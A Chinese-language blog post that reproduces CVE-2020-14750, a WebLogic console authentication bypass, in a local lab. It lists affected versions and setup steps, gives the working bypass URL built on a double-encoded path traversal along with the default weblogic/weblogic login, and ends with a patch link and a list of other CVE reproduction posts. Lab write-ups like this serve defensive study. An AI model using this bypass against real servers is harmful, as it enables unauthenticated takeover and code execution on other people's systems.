CVE-2020-14750 WebLogic許可權繞過漏洞復現

阿新 • • 發佈：2021-08-22

0x01 漏洞概述

Oracle Fusion Middleware（Oracle融合中介軟體）是美國甲骨文（Oracle）公司的一套面向企業和雲環境的業務創新平臺。該平臺提供了中介軟體、軟體集合等功能。

Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞，該漏洞是CVE-2020-14882 補丁的繞過，遠端攻擊者可以構造特殊的 HTTP 請求，在未經身份驗證的情況下接管 WebLogic Server Console ，從而執行任意程式碼。

0x02 影響版本

Oracle:Weblogic :

10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0

0x03 環境搭建

windows10 x64
jdk 1.8.0
WebLogic 12c

①下載weblogic 12c

　　https://www.oracle.com/middleware/technologies/fusionmiddleware-downloads.html

②安裝weblogic 12c

　　1. 使用jdk1.8開啟下載的fmw_12.1.3.0.0_wls.jar開始安裝

　　　　安裝過程參考了部落格

　　　　https://www.cnblogs.com/smile502/p/12784978.html

　　2. 安裝完在目錄下執行startWebLogic.cmd

③啟動完畢後在瀏覽器訪問

0x04 漏洞復現

①觀察正常成功登陸的頁面URL（預設賬號密碼weblogic/weblogic）

　　http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1

②構造URL繞過登陸

　　http://127.0.0.1:7001/console/images/%252E./console.portal

　　這裡的%252E是 . 二次url編碼的結果

　　成功繞過登陸：

0x05 修復建議

　　下載官方補丁進行修復

　　https://www.oracle.com/security-alerts/alert-cve-2020-14750.html

CVE-2020-14750 WebLogic許可權繞過漏洞復現

0x01 漏洞概述 Oracle Fusion Middleware（Oracle融合中介軟體）是美國甲骨文（Oracle）公司的一套面向企業和雲環境的業務創新平臺。該平臺提供了中介軟體、軟體集合等功能。

CVE-2020-0796“永恆之黑”漏洞復現

0x00 漏洞概述 Microsoft Server Message Block 3.1.1(SMBv3)協議在處理某些請求的方式中存在程式碼執行漏洞。攻擊者可以精心構造資料包傳送到SMB伺服器，無需經過身份驗證，即可在目標伺服器上執行任意程式碼。攻

(CVE-2020-17530)Struts2 S2-061漏洞復現

0x01 前言 Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530)，在使用某些tag等情況下可能存在OGNL表示式注入漏

CVE-2020-15778 OpenSSH命令注入漏洞復現

技術標籤：滲透測試 CVE-2020-15778 OpenSSH命令注入漏洞復現漏洞描述 OpenSSH是用於使用SSH協議進行遠端登入的一個開源實現。通過對互動的流量進行加密防止竊聽，連線劫持以及其他攻擊。OpenSSH由OpenBSD專案的

CVE-2020-17530 Struts2程式碼執行漏洞復現

0x01 漏洞概述 Apache Struts是美國阿帕奇（Apache）基金會的一個開源專案，是一套用於建立企業級Java Web應用的開源MVC框架，主要提供兩個版本框架產品，Struts1和Struts2。

CVE-2020-1938 Tomcat檔案包含漏洞復現

0x01 漏洞概述 Apache Tomcat是美國阿帕奇（Apache）軟體基金會的一款輕量級Web應用伺服器。該程式實現了對Servlet和JavaServer Page（JSP）的支援。

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645Weblogic遠端程式碼執行漏洞復現漏洞介紹今日，Oracle官方釋出WebLogic安全更新，其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645)，該漏洞通過T3協議進行利用，攻擊者可以實現遠端程式碼執行

CVE-2020-14644 weblogic iiop反序列化漏洞

0x00 weblogic 受影響版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 0x01 環境準備

CVE-2020-14882 weblogic 未授權命令執行復現

簡介未經身份驗證的遠端攻擊者可能通過構造特殊的 HTTP GET請求，利用該漏洞在受影響的 WebLogic Server 上執行任意程式碼。

CVE-2017-12635（Couchdb 垂直許可權繞過漏洞）

Couchdb 垂直許可權繞過漏洞漏洞描述 1.漏洞編號：CVE-2017-12635 2.影響版本：小於 1.7.0 以及小於 2.1.1

（CVE-2021-3156）Linux sudo許可權提升漏洞復現

技術標籤：許可權提升提權網路安全CVE-2021-3156 漏洞概述 1月26日，Sudo釋出安全通告，修復了一個類Unix作業系統在命令引數中轉義反斜槓時存在基於堆的緩衝區溢位漏洞。當sudo通過-s或-i命令列選項在shell模式下

【SQL】CVE-2012-2122 MySQL身份認證繞過漏洞復現

漏洞簡介當連線 MariaDB / MySQL 時，輸入的密碼會與期望的正確密碼比較，由於不正確的處理，會導致即便是 memcmp() 返回一個非零值，也會使 MySQL 認為兩個密碼是相同的。

CVE-2020-14882 weblogic 未授權訪問漏洞

（1）許可權繞過漏洞（CVE-2020-14882），因為CVE-2020-14882未授權訪問漏洞是繞過管理控制檯許可權訪問後臺，所以需要存在console控制檯，訪問：ip:port/console

Linux Polkit本地許可權提升漏洞復現（CVE-2021-4034）

漏洞描述 Polkit 是用於在類 Unix 作業系統中控制系統範圍特權的元件。它為非特權程序提供了與特權程序進行通訊的有組織的方式。

CVE-2020-5902 F5 BIG-IP RCE復現

目錄簡介影響版本搜尋語法原理解析手動復現利用工具參考簡介 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

Discuz 7.x6.x 全域性變數防禦繞過漏洞復現

目錄0x00漏洞概述0x01環境說明0x02靶場搭建0x03漏洞復現0x04GetShell4.1一句話木馬4.2任意檔案執行

CVE-2020-1472 | Netlogon 特權提升漏洞預警

CVE-2020-1472 | Netlogon 特權提升漏洞預警 0x01 簡介 CNVD:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202008-548

CVE-2020-1971: OpenSSL 拒絕服務漏洞修復

2020年12月8日openssl釋出了openssl 拒絕服務漏洞的風險通告，該漏洞編號為CVE-2020-1971，漏洞等級：高危，漏洞評分：7.5。

CVE-2021-35042 Django SQL注入漏洞復現

搭建環境： git clone https://github.com/YouGina/CVE-2021-35042.gitcd CVE-2021-35042 再執行./setup.sh

Office CVE-2017-8570遠端程式碼執行漏洞復現

CVE-2017-8570漏洞是一個邏輯漏洞，利用方法簡單，影響範圍廣。由於該漏洞和三年前的SandWorm（沙蟲）漏洞非常類似，因此我們稱之為“沙蟲”二代漏洞。

CVE-2020-14750 WebLogic許可權繞過漏洞復現

相關推薦